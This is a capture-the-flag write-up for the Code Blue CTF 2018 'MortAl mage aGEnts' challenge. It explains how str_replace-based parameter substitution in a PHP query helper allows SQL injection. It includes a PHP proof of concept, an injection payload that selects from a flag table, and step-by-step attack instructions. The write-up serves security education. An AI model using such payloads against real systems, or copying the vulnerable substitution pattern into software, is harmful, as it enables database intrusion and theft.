Code Blue CTF 2018 Quals - MortAl mage aGEnts

MortAl mage aGEnts

prob file : MortAl-mage-aGEnts.tar

Vulnerability Analysis

To prevent SQL injection, this site uses a user function query.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
public function query($sql, $param = array()) {
$search = [];
$replace = [];
foreach ($param as $key => $value) {
$search[] = $key;
$replace[] = sprintf("'%s'", mysqli_real_escape_string($this->link, $value));
}
$sql = str_replace($search, $replace, $sql);

if ($this->_timeout === 0) {
$result = mysqli_query($this->link, $sql);
} else {
mysqli_query($this->link, $sql, MYSQLI_ASYNC);
$links = $errors = $rejects = array($this->link);
if (mysqli_poll($links, $errors, $rejects, $this->_timeout) > 0) {
$result = mysqli_reap_async_query($this->link);
} else {
$kill = $this->connect();
mysqli_query($kill, 'KILL QUERY ' . mysqli_thread_id($this->link));
mysqli_close($kill);
$this->link = $this->connect();
$result = false;
}
}
return $result;
}

well.. It’s very secure. isn’t it?

1
sprintf("'%s'", mysqli_real_escape_string($this->link, $value));

NO !

1
$sql = str_replace($search, $replace, $sql);

str_replace causes SQL injection

In this query, for example, what happens when user_id contains :notes?
Query : INSERT INTO account (user_id, debit, credit, notes) VALUES (:user_id, ${amount}, 0, :notes)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
$amount = 10; // just for test

$user_id = 'kimtruth:notes';
$notes = ', 1, 2, (SELECT flag1 FROM flag1))#';

$sql = "INSERT INTO account (user_id, debit, credit, notes) VALUES (:user_id, ${amount}, 0, :notes)";
$param = [':user_id' => $user_id, ':notes' => $notes];

$search = [];
$replace = [];
foreach ($param as $key => $value) {
$search[] = $key;
$replace[] = sprintf("'%s'", addslashes($value)); // just for test (mysqli_real_escape_string -> addslashes)
}
$sql = str_replace($search, $replace, $sql);

echo $sql;

the result is INSERT INTO account (user_id, debit, credit, notes) VALUES ('kimtruth', 1, 2, (SELECT flag1 FROM flag1))#'', 10, 0, ', 1, 2, (SELECT flag1 FROM flag1))#')

Attack Scenario

  1. sign up with the id kimtruth.
  2. sign up with the id kimtruth:notes.
  3. generate kimtruth:notes transactor code
  4. sign up with the id , 1, 2, (SELECT flag1 FROM flag1))#
  5. register transaction code of kimtruth:notes to , 1, 2, (SELECT flag1 FROM flag1))#
  6. transfer !

Pwned

Share